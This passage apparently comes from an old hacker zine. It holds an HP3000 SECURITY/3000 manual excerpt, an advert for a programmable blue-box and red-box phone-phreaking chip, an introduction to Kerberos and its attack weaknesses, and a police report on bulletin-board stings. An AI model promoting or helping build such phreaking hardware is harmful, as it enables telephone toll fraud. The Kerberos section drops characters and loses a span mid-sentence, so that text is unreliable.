on, he should change the password and re-define "obsolescence days" when prompted. ACCESSING THE OBSOL DATA BASE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The password obsolescence data base is OBSOL.DATA.SECURITY and contains the following data sets: OBS-ACCT OBS-USER OBS-GROUP The data base contains information about all the passworded users, groups, and accounts on the system. IT DOES NOT CONTAIN THE MPE PASSWORDS. The valid data items are as follows: LAST-CHG-DATE the date (in YY/MM/DD format) that the password was last changed OBS-DAYS number of obsolescence days WARN-DAYS number of warning days Ignore DUMMY1, DUMMY2, and FILLER--they're just there for SECURITY/3000's convenience. For added security, it is normally recommended that the system manger change the data base password (as follows) and the password obsolescence system will still be able to (magically!) access the data base: :HELLO MANAGER.SECURITY,DATA :RUN DBUTIL.PUB.SYS >>SET OBSOL PASSWORD 1=password >>EXIT TERMPASS -- passwords DIAL-UPs, terminals, DS lines, LANs, etc. *************************************************************** INTRODUCTION ~~~~~~~~~~~ With the current explosion in datacom and with HP providing all supported sites with telesupport modems, nearly every HP3000 site has dial-up access. With the added benefits and convenience that dial-up access provides, a whole new world of security considerations emerges: the system is threatened not only by users within your company or on your premises, but by anyone with a terminal or microcomputer, a telephone, and a modem! With the current wave of computer crime and the new breed of "hackers" whose enjoyment comes from wreaking havoc <sic> on computer systems, special security must be placed on dial-up lines. TERMPASS implements this extra security not only on dial-up lines but on DS lines, terminals, and anything else that supports interactive communication (MTS, LAN, X.25, etc.). Unfortunately, although MPE permits user, account, and group passwords, it does not allow one to set terminal passwords. TERMPASS allows the System Manager to set a password on any LDEV, which must be answered correctly by the user at logon time to gain access to the system. In addition, it allows you to marry the high level of user authentication that the Logon Security System provides with the terminal and dial-up security that TERMPASS gives you. You can implement the Logon Security System not only on certain accounts and certain users, but also based on which device a user is logging on to. HOW TERMPASS WORKS ~~~~~~~~~~~~~~~~~ TERMPASS is configured by specifying which LDEVs are to be passworded and what the passwords are. Then set a systemwide logon UDC which will run the TERMPASS program whenever users log on. Whenever a user logs on to a terminal which has been configured with a password, after he correctly answers required MPE passwords, he is prompted for the terminal password for that terminal. If he answers correctly, he is allowed on the system. If he answers incorrectly, he is denied access to the system (i.e. logged off, an inverse-video message describing the failed logon attempt is sent to the console, and an entry is logged to the SECURITY/3000 log file. SETTING PASSWORDS ON SPECIFIC LDEVs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can configure TERMPASS by specifying which terminals are to be passworded and what the passwords are. To do this, build the file TERMPASS.DATA.SECURITY with your editor, and add one line for each terminal to be passworded in the format LDEV password where 'LDEV' is the logical device number of the terminal (e.g. '20') to be passworded and 'password' is the password (e.g. 'OPERONLY'). Any terminal not included in this file will remain unpassworded. So, for example, if you created the TERMPASS data file in your editor as follows: :EDITOR /ADD 1 20 OPERONLY << the console >> 2 21 WARGAMES << a dial-up line >> 3 22 XYZZY << a terminal >> 4 65 KEEPOUT << a DS line >> 5 // /KEEP TERMPASS.DATA.SECURITY,UNN /EXIT then the passwords specified would be placed on the corresponding LDEVs. AFTER YOU /KEEP THIS FILE (AND AFTER ANY SUBSEQUENT /KEEPs), YOU MUST :ALTSEC TERMPASS.DATA.SECURITY;(R,X,A,L,W:CR) THIS IS EXTREMELY IMPORTANT! IF YOU DO NOT DO THIS, ANYBODY WILL BE ABLE TO READ THIS FILE! YOU MAY ALSO USE A LOCKWORD TO PROTECT THIS FILE: :RENAME TERMPASS.DATA.SECURITY, TERMPASS/lockword.DATA.SECURITY DISABLING A TERMINAL WITH AN ATTEMPTED REMOTE LOGON VIOLATION ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If a user is unsuccessful in logging on through a dial-up line or an inhouse terminal configured with TERMPASS, it is often desirable to "hang" that LDEV or terminal so that further logon attempts are not possible. To do this, determine the time in seconds for which you would like the LDEV or terminal hung and then add a line to the TERMPASS.DATA.SECURITY file in the format: PAUSE=numseconds where 'numseconds' is the number of seconds for which the terminal will be hung. Then, when a user has an unsuccessful logon attempt, he will be hung for the amount of time specified. By default, 'numseconds'=0 which means that the user will not be hung at all. SPECIFYING NUMBER OF ATTEMPTS TO ANSWER TERMINAL PASSWORD ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You may specify the number of attempts users are allowed to answer the terminal password at logon by adding a line to the TERMPASS.DATA file in the format: TIMES=attempts where 'attempts' is the number of times the terminal password will be asked. By default, 'attempts'=1. LOGGING SUCCESSFUL REMOTE LOGONS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You may wish to know who is logging on through the dial-up line, or whether a particular logon is being utilized. You may also feel relieved to see that an unsuccessful attempt is directly followed by a successful attempt, meaning that the error was probably a typo. You may enable SECURITY/3000 to log successful logons which pass through the TERMPASS program by adding a line to the TERMPASS.DATA.SECURITY file in the format: LOG-LOGON=ON This keyword will be seen by the REMOTE security system and cause all successful logons to be written to the LOG.DATA.SECURITY file for later review. No other configuration is required and this keyword may be added or removed at any convenient time. When the log file is later reviewed (see HOW TO LIST THE SECURITY LOG FILE in the LOGON section of this manual) the message: 'SUCCESSFUL REMOTE LOGON' will be displayed. INVOKING THE LOGON SECURITY SYSTEM VIA TERMPASS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Generally, the Logon Security System in SECURITY/3000 (personal profile passwords, time, day, and menu restrictions) are imposed on certain users and accounts by setting a UDC (SECURUDC.PUB.SECURITY) on that user or account; then all the users who have that UDC set must go through SECURITY/3000 to log on However, you can also impose the Logon Security System on users logging on to certain devices instead of (or in addition to) users on which SECURUDC has been set. Say, for example, you want to have the Logon Security System run EITHER on the users/accounts on which you've set SECURUDC OR on any accesses to the system from certain LDEVs (e.g. dial-up modem ports, DS line ports, terminal ports, etc). For example, to set things up so that anybody who EITHER uses the PAYROLL account OR signs on to LDEV 36 (or both) will have to go through the Logon Security System, declare a line in the TERMPASS configuration file, TERMPASS.DATA.SECURITY, which looks like this: 36 SECRET $SECURITY Note that LDEV 36 still has a terminal password ("SECRET"); but, because there is a '$SECURITY' keyword on that line means that IN ADDITION TO TERMPASS asking the terminal password, the Logon Security System will always be run for all logons to LDEV 36. If you want to, you can implement the Logon Security System on an LDEV without placing a password on that LDEV - just omit the terminal password ("SECRET") while keeping the $SECURITY keyword, leaving the line looking like 36 $SECURITY Note that you still have to set the TERMPASS UDC (TERMUDC.PUB.SECURITY) on a system-wide basis, since it's the TERMPASS program that checks the TERMPASS.DATA.SECURITY file and invokes SECURITY/3000's Logon Security System if it finds the $SECURITY keyword associated with the logon LDEV. So, for example, TERMPASS.DATA.SECURITY might look like: 20 OPERONLY 25 $SECURITY 36 SECRET $SECURITY This would mean that LDEV 20 has the password "OPERONLY" but won't have SECURITY/3000 automatically invoked; 36 has the password "SECRET", and anybody who logs on to it would have to go through the Logon Security System; and LDEV 25 has no terminal password, but all people who use it will be checked by the Logon Security System. Meanwhile, SECURUDC is still set on the PAYROLL account, and on whatever other users or accounts you want to always be secured; the Logon Security System will be run on them whether or not the user is using LDEV 25 or 36. Of course, every user who will ever go through the Logon Security System - this includes every user who will ever sign on to LDEV 25 or 36--must be put into the SECURITY database using the ADD option of USER.PUB.SECURITY. This actually is quite good, since it gives you the opportunity to allow only certain users to use LDEV 25 or 36 - just authorize only those users, and all others will be automatically forbidden. Note that the Logon Security System can thus be called either from the TERMPASS UDC (TERMUDC.PUB.SECURITY) you set up on a system-wide basis or the Logon Security System UDC (SECURUDC.PUB.SECURITY) you set up on each account or user. What if a user signs on to a secured account using a secured terminal? Well, you don't want to make him go through the Logon Security System twice, so if the Logon Security System was already run via TERMPASS, it won't be run again. STREAMX/3000 - ELIMINATES THE NEED TO EMBED PASSWORDS AND OTHER SENSITIVE INFORMATION IN JOB STREAMS ************************************************************************ INTRODUCTION ~~~~~~~~~~~ In MPE, all job streams must contain the passwords for the user, account, and group under which they are to be streamed. Needless to say, this is a huge security hole because anyone who has READ access to the file can look at it and see the passwords. What's more, any listing of the job stream (of which plenty are liable to be laying around the computer room) contains the password. Furthermore, although MPE passwords are not echoed to the screen when you log on, they are when you're working on a job stream in the editor. Who is looking over your shoulder at your password on the screen? If you are working on a job and walk away from your terminal, who can read it? Do you always clear the screen when you walk away from the terminal--or even when you log off? More importantly, since changing a password means having to change every single job stream that contains it, MPE passwords are virtually guaranteed never to be changed. Some HP3000 sites work around this problem in a variety of ways, few of which are very effective. A common "solution" is to create a dummy user (e.g. 'JOB') who exists solely for the purpose of streaming jobs, and remove his IA capability--this can be gotten around quite easily by logging on with a :JOB command and prefixing every command with a ':'. Others try to use the MPE file security to restrict READ access to job stream files, but forget to :ALTSEC the file to replace the file security after every /KEEP of the file (which waives the prior file security). THE SOLUTION ~~~~~~~~~~~ STREAMX/3000 closes this security hole by eliminating the need to embed MPE passwords in job streams. It also eliminates the need to embed other sensitive information in job streams, such as data base passwords, file lockwords, :REMOTE HELLO passwords, etc. STREAMX also adds flexibility to job streams by allowing you to pass parameters. The logical alternative to embedding passwords in job streams is to prompt for the passwords at :STREAM time, just as session passwords are prompted for at :HELLO time. This is what STREAMX does. And to make life easier, if you have enough capabilities to retrieve the passwords, they will be answered for you automatically. HOW STREAMX WORKS ~~~~~~~~~~~~~~~~ When you stream a job, STREAMX will analyze the job stream, as well as all the job streams streamed by it, and will prompt you for all the passwords needed as well as any parameters for which you have instructed STREAMX to prompt. Then, it will incorporate the passwords and parameters into the job stream (without changing the actual disc file), and then stream it. As in MPE, the output file of the job stream will not contain the passwords. Naturally, STREAMX will not prompt you for passwords that do not exist. If the job stream already has the correct passwords embedded in it, those passwords will not be prompted for; on the other hand, if the passwords embedded in the stream are incorrect, they will be prompted for. This permits you to change your MPE passwords and begin using STREAMX right away. Also, if you have enough capabilities to retrieve the passwords in MPE (via :LISTUSER, :LISTACCT and :LISTGROUP or LISTDIR), STREAMX will automatically generate the passwords without any prompting (because, after all, you can find them out anyway). This means that if you are an Account Manager streaming a job in your account or an ordinary user streaming a job with the same user ID, STREAMX will automatically generate the passwords (because you had to know them to sign on). If you are the System Manager (or have SM capability), STREAMX will never prompt you for a password because you can retrieve any password on the system. WHICH USER STREAMED A JOB? (ENHANCED JOB $STDLIST) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ STREAMX will enhance the $STDLIST of a job to contain some additional information. The logon user ID of the user streaming the job and the LDEV from which the job was streamed will be written to the job's output file, e.g. :COMMENT STREAM FILE UPDATE.PUB.PAYROLL :COMMENT STREAMED BY JOAN,CLERK.PAYROLL,PUB ON LDEV 26 so you can determine not only who the job logged on as, but also who actually streamed it. If the job stream was launched from another job stream, the user ID (from the !JOB card) of the first job stream will be written to the output file, as well as the user who streamed that job stream. PERMITTING THE SYSTEM OPERATOR TO STREAM ANY JOB STREAM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In many installations, the system operator (OPERATOR.SYS) is responsible for streaming system job streams which accomplish backups, etc. STREAMX will prompt the operator for the password for each !JOB card; but you may not want to disclose various passwords to the operator. As you know, STREAMX will not prompt for the passwords if a user has enough capabilities to retrieve them, e.g. MANAGER.SYS can stream any job on the system without being prompted for the passwords; but you do not want to give your operator SM capability to accomplish the streaming of system job streams. A good solution is to put all the system job streams in a special group, e.g. JOB.SYS, and set up a UDC which the operator will use to stream the jobs which will also temporarily allow the user SM capability for the duration of streaming the job. The following UDC runs the GOD.PUB.VESOFT program which gives the user SM capability, then runs STREAMX to stream the job, and then runs MORTAL.PUB.VESOFT to reset the user's capabilities to their original state. Notice that the UDC is OPTION NOBREAK and contains a CONTINUE command so that after the program GOD is run, there is a very high probability that the capability reduction program MORTAL will execute. This increase and subsequent guaranteed reduction of capability is what makes this UDC successful. Notice also that the UDC has the option NOLIST. If the operator could see the text of the UDC executing, then the operator would know the lockword to the program GOD. Additionally, the UDC option NOHELP has been specified to prevent the operator from :HELP OPSTRM which also reveals the program GOD's lockword. OPSTREAM filename OPTION NOHELP, NOLIST, NOBREAK FILE STRMFILE=!FILENAME.JOB.SYS RUN GOD/lockword.PUB.VESOFT CONTINUE RUN STREAMX.PUB.SECURITY;PARM=1 RUN MORTAL.PUB.VESOFT RESET STRMFILE There are two other important technical issues to be mentioned. First, the operator should not be able to write to, nor save a file into the controlled group JOB.SYS. Otherwise, the operator could create a job stream which logs on as MANAGER.SYS and LISTDIR's all the MPE passwords. If the operator has write access, there is no need to save a special file into the controlled group JOB.SYS - just write over one that is already there. Second, the operator should not have READ access to the UDC file which contains the lockword to the program GOD. If both these points are maintained, the operator will not be able to circumvent the intent. Note also that in order to :SETCATALOG a UDC file you must have READ and LOCK access to it. This means that an ordinary setcatalog of the UDC file will not provide adequate security (read access is not permissable). The solution is to use a LOCKWORD to protect the UDC file OPSTRM. This means you can release the file and then assign it a lockword. Now when you :SETCATALOG the file, you must specify the lockword also (e.g. :SETCATALOG OPSTRM/secret). BUT - the file COMMAND.PUB.SYS has read access for all users, thus it can be scanned and the lockwords with which UDC's are set can be determined. Also - if someone is reading this file (say, with FCOPY, QUAD, etc.), another process cannot resolve its UDC catalog. This is especially of concern where OPTION LOGON UDCs are invoking SECURITY. Be sure to reduce the general access to COMMAND.PUB.SYS so that the file may only be Locked and Xecuted - by :ALTSEC COMMAND.PUB.SYS;(L,X:ANY). So - with this UDC set for the operator, whenever the operator types :OPSTREAM filename the job stream filename.JOB.SYS will be streamed and the passwords needed on the !JOB card will be resolved automatically - regardless of the job's logon user ID. LOCKWORDS ~~~~~~~~ Just as you shouldn't embed passwords into your job streams, you shouldn't embed lockwords, either. If you have a lockword on, say, QUERY.PUB.SYS, you might have a line in your job stream like !RUN QUERY/?WHAT IS THE QUERY.PUB.SYS LOCKWORD?.PUB.SYS Or, even better, you can say !RUN QUERY/?$NOECHO$ WHAT IS THE QUERY.PUB.SYS LOCKWORD?.PUB.SYS which won't echo the user's response. However, STREAMX has an even better way of doing this! If you say !RUN ?$LOCKWORD=QUERY.PUB.SYS$? then STREAMX will automatically ask the user for the QUERY.PUB.SYS lockword, or -- if the user is the system manager or the account manager of the SYS account (the account in which QUERY.PUB.SYS resides) -- automatically supply the lockword. This is just like the way STREAMX treats :JOB card passwords -- it asks for them when necessary, but automatically supplies them when appropriate. For instance, if the person streaming the job stream has SM capability and the QUERY.PUB.SYS lockword is FROBOZZ, STREAMX will automatically convert the !RUN ?$LOCKWORD=QUERY.PUB.SYS$? to a !RUN QUERY/FROBOZZ.PUB.SYS On the other hand, if the streaming user doesn't have SM/AM capability, STREAMX will prompt him with WHAT IS THE LOCKWORD OF THE FILE 'QUERY.PUB.SYS'? and will use the user's answer (entered without echo, of course) as the lockword to be put into the job stream. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ------------------------------------------------------------------------------- ______ __ __ _ / / / ) / ) // --/ /_ _ / / _ ______ ________ / / o __. // _ __ (_/ / /_</_ /__/_</_/ / / <_(_) / / <_ /__/_<_(_/|_</_</_/ (_ ------------------------------------------------------------------------------- Thanks to Durkatlon for the translation to English. The article comes courtesy of Hacktik Magazine issues #16 an #17. If you can use it, cool, if not, skip on to the next article. This is the form in which I received the file. I have not tested or used this, as yet. Guess that gives me something for another article. ------------------------------------------------------------------------------- ---------------------------------------------------------------------------- / From Vodka, the Absolut drinking, Alpine smoking, information specialist.. \ | | | Member of: PHD, Alliance Crew Associated with: Too many to list | | | | Hello's go out to: Dark Druid, Erik Bloodaxe, Mack Hammer, Knight Lightning| | Marina, Randy S. Hacker, Nikodemus... And all the rest. | | | | This submission for information purposes only, NOT FOR ANY OTHER PURPOSE | \____________________________________________________________________________/ DEMON DIALER SPECS ------------------ The chip contains a blue-box, DTMF dialer, C4 and ATF1 tonegenerator and much more. Just about the whole stratum of phone-phreak knowledge has been incorporated into this device and because the chip contains an amount of RAM memory, new signalling systems can be built in. The ideal tool for today's phone-phreak. In the sequel is a list op all the abilities of the MC68HC705C8P/DD, as it is officially called. Furthermore a small overview of what it takes to put a nice little box around it. THE MC68HC705C8P/DD ------------------- It's a Motorola processor of the 68705 kind, programmed by us. It only requires an additionla matrix keyboard of 3 by 4 keys, a couple of resistors, and a D/A convertor with a filter. Hook it up to 5 Volts and there ya go, da perfect phone-phreakin' tool. If you power up the chip it's just a DTMF dialer, and if you don't enter the right code that's exactly what it will stay. Only after the code's been entered (which by the way is a different one for each chip) you can switch to the other modes: o DTMF, RedBox, C3, C4, C5, R1, R2 (both directions) and ATF1 modes built-in. 2 new sistems can be programmed later. o Guard banding: Every tone or double-tone can be combined with a third frequency. o Advanced Macro capabilities. Macro nesting is possible. o All settings are stored in RAM if the machine is switched off. o For DTMF, C5 and C3, both space and mark timing are possible. o C3 has programmed space and mark frequency and is thus useable as a general purpose signalling system. Furthermore pulse-dialing is possible through a relais-control-signal. o User-Defined-Modes can make use of variable timing and frequencies. o Tone-sweep and the ability to set starting frequency and step-size. Also useable for continuous sweep. o Phone number scan with variable step size for all signalling systems CONSTRUCTION ------------ The MC68HC705C8P/DD is at the heart of a do-it-yourself bluebox, but a number of elements you will have to build yourself. You're going to have to connect the matrix keyboard as well as a simple D/A convertor and a speaker. The total cost of hardware to be added shouldn't exceed the amount of 50 guilders. On the flip page is the schematic [heheh..] and shipped with the chip is a comprehensive set of datasheets and a software manual both in English and Dutch. The hardware description pays more attention to the D/A convertor, filter, keypad etc. than does this short article. Furthermore it contains schematics to make the device run on 3 volts and drive an 8 ohm speaker. HOW TO OBTAIN THE CHIP? The chip costs 250 guilders, including shipping, a Dutch and English manual of the software and a detailed description of the hardware. Pay the mailman. For more information call +31-20-6001480. *** NOTE: $1.00 US ~ 1.80 guilders - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - The Kerberos Authentication System - An Intoduction by x0d Introduction ------------ This article is an introduction to Kerberos, an authentication system written at MIT. It covers the security problems that motivated the creation of Kerberos, the basic mechanisms of the Kerberos protocol and finally some security flaws in the kerberos ystem. The first section covers some network security strategies and the problems encountered. The second section goes through the Kerberos protocol in a step by step fashion. The final section briefly touches on some known attack plans in breaking Kerberos as well as some limitations it has when adapted to other environments. Motivation ---------- Networks allow many computers to convey information amoung each other. Individual machines need not provide all the services needed by its users but can rely on remote machines to provide services. Special program called servers can be run on a specif ed machine, and anytime that service is needed a program on the remote machine, called a client, can request the service on behalf of the local machine. The idea of networked servers and clients is well integrated into modern computing. Sometimes a ser er deals with importaint personal information such as mail and must know the identity of the user requesting the data. More than that the server would like to be sure that the user requesting the service is indeed who he says he is. Remote servers can authenticate clients trying to access their sevices in several ways. First the remote server can do nothing. In this case the remote server is depending on the clients host for authentication. An example of this is the smtp service When a client connects to this server it is assumed that all data it receives is valid. If the client side decides to give false information the service will gladly accept it, resulting in forged mail. It is up to the client's host to keep this from appening. A second example is the yp service. Unless carefully set up any client can connect to and use the remote yp database server and it is up to the clients host to keep unauthorized users from using the client (through permissions on the client p ogram). A more secure authentication can be achieved by having the client's host machine authenticate itself to the service but then trust any information that host passes on about the identity of the client. This is the strategy of rlogin, rsh and the system of 'trusted' hosts. If a connection comes from a rlogin client on a trusted machine (which is weekly authenticated by the fact that it has the correct address) then the service will allow the client to login to an account of the same name. This trategy fails if the clients machine can forge its address (and hence bypass the authentication) or if the security on the client's machine has been bypassed allowing the client to take on any username. In a more ideal authentication system a compromise in security on one machine wouldn't lead to a compromise in secuity on a remote system. The authentication system that Kerberos uses is based on an individual authentication of each client. In this system a client must authenticate itself for each service it uses. The remote login service offered by the telnetd server is an example of th s. The client cannot login to a remote account through the service unless the proper acount name and password where entered. Although this may sound like a secure operation there is one major flaw to it. Whenever a password is transmitted over the ne work it is in danger of being compromised. A third party may be monitoring the network traffic as it goes by and see the login name and password as they are being used. This can be more dangerous than using the trusted host paradigm. It is important to look at the environment that Kerberos was designed for when looking at Kerberos. Kerberos was designed at MIT for MIT's Project Athena. The hardware environment there consists of many privately owned and many publically accessible w rkstations connected in a network with along with several time-sharing machines which also act as file servers. Many services are available with servers on many machines in the network. For example many machines may be running a (modified) rlogin serve . Security of the workstations cannot be trusted. They may be privately owned machines and the owner may be free to bypass all security, or they may be rebooted with a different root file system. Once a user has bypassed the general securities on the machine he is free to alter his identity, alter his machines address, and even eaves-drop over the network. The goals in creating the Kerberos authentication system where based on the environment. A machines address could not be trusted. The user-id of a user on a particula machine could not be trusted. Any information sent over the network should be usele s in attempts to impersonate another user. c - client Kx - x's private key s - server Tc,s - Ticket for c to use s Kc,s - key shared Ax - Authenticator for client x between c and s {abc}Kx - abc encrypted in key Kx tgs - ticket granting server life - a tickets lifespan kerb - authentication server addr - a clients address Figure 1. Abbreviations. ------------------------- The kerberos system itself is implemented as a collection of servers. The two major types of severs in the Kerberos system are authentication servers (called kerberos servers) and ticket granting servers (often refered to as tgs in this paper). Kerberos uses a system of private keys, tickets and authenticators. A private key is a secret key used for encryption and decryption. Reading a message encrypted in certain key is only possible if the key is known, similarly encrypting a message in a certain key is only possible if the key is known. Kerberos currently uses a modified DES algorithm known as DES cypher block chaining. Normally DES encrypts each block (an arbitrary group of bits) seperately but in cypher block chaining encryption of t e second block depends on the contents of the first block. A ticket is a message (See Figure 2) {Tc,s} Ks = { s, c, addr, life, Ks,c } Ks Figure 2. Ticket. ------------------ that allows a client to use a service in much the same way a movie ticket allows a person to be admitted into the theatre. To prevent a ticket from being altered it is encrypted in a key known only to the server that the ticket is intended for. The ticket contains the name of the serve, the name of the client who can use the ticket, the address of that client, the lifetime for which t e ticket can be used (tickets usually expire 8 hours after the initial login), and the key that is shared between the server and client. An authenticator is a message which contains identification information about a client. Authenticators are always en rypted in a key shared by the client sending it and the server it is sent to. Authenticators contain the clients name, the clients address, and a timestamp. All the clients and servers using kerberos must have loosely synchronized clocks. Any authent cator older than five minutes is invalid. {Ac} Ks,c = { c, addr, timestamp } Ks,c Figure 3. Authenticator. ------------------------- Mechanics --------- Using kerberos involves three processes. First a user must log in. When logging in the user's client receives a ticket to use the ticket granting service upon being authenticated. This ticket allows him to use the ticket granting service which is use in getting tickets for any other service that the client wants to use. After getting a ticket from the ticket ganting server the client can use that server until the ticket expires. Since any new ticket granted has a lifetime that is the same as the ticket used to acquire it, all tickets expire 8 hours after the initial login (with the exception of certain tickets with specified shorter lifespa ). This means that if a user remains online for 8 hours he must re-login. Besides having to re-log in every 8 hours the entire process is transparent to the user. The login is much like a login to a non-kerberos system and the additional tickets aquir d during the session are all aquired without the users intervention. The goal of the login process is to aquire a ticket to use the ticket granting service and to authenticate the user. If the user is unable to be authenticated he should not be able to access the ticket granting server. When the user walks up to the co puter and enters his login name a message is sent to the authentication server containing the client's name (that is, the name of Client ---- c, tgs ----> Kerb Client <-- { Kc,tgs {Tc,tgs}Ktgs }Kc -- Kerb Figure 4. Login. ----------------- the user) and the (See Figure 4)ticket granting service which the client wishes to use. The kerberos server then builds a ticket (noting the clients name and address in it) for that tgs and encrypts it in a special key that the tgs knows. It also creates a session key which will be u ed in conversations between the client and the tgs. It looks up the clients name and a corresponding key derived from the users password in its database. It then encrypts the session key and the ticket in the clients secret key and sends it back to the client. The user is then prompted for his password. The secret key is then computed from his password and used to decrypt the message from the kerberos server. If the user typed in the wrong password the message will not decrypte properly. If the co rect password is entered the client now holds a ticket to use the tgs and a key to use when sending messages to the tgs. Once a client has a ticket to use the tgs it may request more tickets for other services. The client first builds up an authenticator and encrypts it in the session key. It then sends a message to the tgs containing the name of the requested service the ticket to use the tgs and the authenticator. The tgs first decrypts the ticket with its secret key. In the ticket is the Client -- s, {Tc,tgs}Ktgs, {Ac}Kc,tgs --> TGS Client <-- { {Tc,s}Ks, Kc,s }Kc,tgs -- TGS Figure 5. Getting More Tr. --------------------------- session key the tgs sends back to the client the ticket and the new key all encrypted in the key shared between the client and the tgs. When the client receives the message it just decrypts it and has a ticket for the requested service and a key to use when talking to it. To use a service the client first authenticates itself. It does this by building an authenticator, encrypting it in the key shared between the client and the server and sending it to the server along with the ticket to use that server. When the server gets the ticket it just decrypts the ticket, uses the shared key contained in the ticket to decrypt the authenticator, and compares the information contained in them. If everything matches the client is allowed to use the service and subsequent request will be allowed. In some cases the client would also like to make sure it is indeed talking to the real server and not an imposter. The server can validate itself to the client by taking the timestamp from the authenticator, adding one to it, and sending it back. If the service was ot the real thing, it would not have the servers private key, would not be able to read the ticket and get the Client -- {Ac}Kc,s, {Tc,s}Ks --> Server Client <-- { timestamp + 1 }Kc,s -- Server Figure 6. Getting More Tickets. -------------------------------- shared key, would not be able to read the timestamp and add one to it, and would not be able to re-encrypt it and send it back. If the client recieves the incremented timestamp back it can be sure that the server did indeed have the servers private key. Along with these three important processes there are many other supporting processes in the kerberos system. For example there are the database management processes for adding new users and changing passwords and there are slave kerberos and tgs server which contain copies of the kerberos and tgs databases to avoid a bottlenecks. There is also a kerberos network file system which follows a slightly different protocol in order to avoid the large number of encryptions that using the kerberos protocol w uld cause. Security Flaws -------------- Although Kerberos increases the security of the network it is used on, it is not flawless. There are several proposed line of attacks that could be used against the Kerberos protocol, and several limitations that it suffers when used in an environment ther than the one it was designed for. Kerberos was designed for a network consisting of many workstations being used by individual users connected to a few large time-sharing machines that provide services such as file storage and mail delivery. The keys accumulated by the client during the session are stored in the /tmp directory in the current version of Kerberos. If more than one user was logged in on the same machine it would be possible for one user to view another users session keys and use them to impersonate that user. On the wor stations Kerberos was first implemented on the /tmp directory was located on the workstation itself, but if a diskless workstation was used the keys would have to go over the network to their destination, and back to the workstation whenever accessed. E en on workstations with disks, the keys may be swapped out of memory onto the remote file server if virtual memory is supported. These keys would be easy to intercept by simply watching the network for access to and files in the temporary directory or f r swapped out pages. Use of Kerberos is also problematic when on a large machine with multiple addresses, since each ticket holds information about only one address. On systems with more than one user it is possible for users to find out the keys of ot er users logged in at the same time if they can bypass the security of the temporary files in which they are stored. Once a user has these keys he can impersonate the other user. One of the most popular attacks on the Kerberos protocol is replay. An eaves-dropper can watch as a known client sends an authenticator and ticket to a server. When that client logs out the eaves-dropper can change his address to the address the client was using (and hence the address in the authenticator and the ticket) and change the client name to that of the client. Then the ticket and authenticator can once the security of one of its hosts has been compromised. Kerberos was designed to maintain network se urity even in these circumstances. The mechanisms of encrypted authenticators and tickets was looked at and in particular the pocesses of getting a ticket for the ticket ganting service and getting tickets for arbitary services and then using the services it was looked at. Finally some known flaws and limitations of Kerberos where looked at and it was seen that Kerberos is not yet completely secure from attacks. Bibliography ------------ 1. C. H. Meyer and S. M. Matyas, Cryptography: A New dimension in Computer data Security, John Wiley and Sons, New York (1982). 2. N. Koblitz, A Course in Number theory and Cryptography, Springer-Verlag, New York (1987). 3. A. Salomaa, Public-Key cryptography, Springer-Verlag, Berlin (1990). 4. J. G. Steiner, C. Neuman and J. I. Schiller, Kerberos: An Authetication Service for Open Network Systems (Mar. 1988). 5. S. M. Bellovin and M. Meritt, Limitations of the Kerberos Authentication System, Proc. Winter USENIX Conference, Dallas (1991). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Computer Crime Investigation submitted by: cdmorgan Copied from "Dedicated Computer Crime Units" (A National Institute of Justice Publication!) Bulletin Board Stings --------------------- While most bulletin boards have been established for legitimite purposes there are also "pirate" or "elite" boards that contain illegal information or have been established for an illegal activity. Security on these boards is tightly controlled by the owners. With these bulletin boards, users usually have to contact the owner directly to obtain a password for access to different levels of the system. A degree of trust must therefore be established before the owner will allow access to the board, and the owners develop power over who can use the system. These boards have a variety of information on them including the following: * Stolen credit card account numbers * Long distance telephone service codes * Telephone numbers to main frame computers, including passwords * Procedures for making illegal drugs and explosives * Hacking programs * Tips on how to break into computer systems * Schematics for electronic boxes (e.g. Blue Box) These boards are obviously a threat to communities, and their exsistance has gained the attention of police departments. Sting Operations with Bulletin Boards Members of the Maricopa County,Arizona, Sheriff's Department were the first in the country to establish such a board. Their board resulted in over 50 arrests with the usual charge being telecommunications fraud. In September, 1985, the Fremont Police Department established a bulletin board for the primary purpose of gathering intelligence on hackers and phreakers in the area. The operation was partially funded by VISA, Inc., with additional support from Wells Fargo Bank, Western Union, Sprint, MCI, and ITT. After Establishing their bulletin board, They advertised it on other boards as the newest "phreak board" in the area. Within the first four days over 300 calls were received on the board. During the next three months, the board logged over 2,500 calls from 130 regular users. Through the bulletin board,they persuaded these groups that they had stolen or hacked long-distance telephone service codes and credit card account numbers. (provided by the aforementioned companies). They were readily accepted and were allowed access to other pirate boards in the area. The board was operated for a total of three months. During that period, over 300 stolen credit card account numbers and long distance telephone service codes were recovered. Passwords to many government, educational, and corporate computers were also discovered on other boards. The operation resulted in the apprehension of eight teenagers in the area who were charged with trafficking in stolen credit card accounts, trafficking in stolen long distance telephone service codes, and possession of stolen property. Within the next week, seven more teenagers in California and other states were arrested based on information from this operation. It was estimated that this group had been illegally accessing between ten and fifteen businesses and institutions in California. They were regularly bypassing the security of these systems with stolen phone numbers and access codes. One victim company estimated that it intended to spend $10,000 to improve its security and data integrity procedures. Other victimized businesses were proceeding along the same lines. Conclusions There are several reasons for conducting Sting operations of this type. One of the most important is that it provides a proactive method of identifying hackers and phreakers in the area. These groups are particularly hard to find since they operate in closed circles with personal networks developed from friendships. Another byproduct of these operations is the publicity surrounding the cases. Sting operations result in a considerable amount of attention from the media. The publicity has the effect of closing down other pirate boards in the area. One of the greatest fears of these offenders is that their systems will be taken, and in the Fremont operation over $12,000 of computer equipment was seized. The publicity associated with these seizures seems to be the primary reason for others to stop their pirate boards. These operations also lead to other types of offenses. In Fremont, for example, drug and alcohol cases were developed as a result of the Sting operation. This has been typical of these operations. The Sting operations with bulletin boards have been criticized because teenagers, rather than hardened criminals, are arrested. Many hackers believe that they have a right to the data in 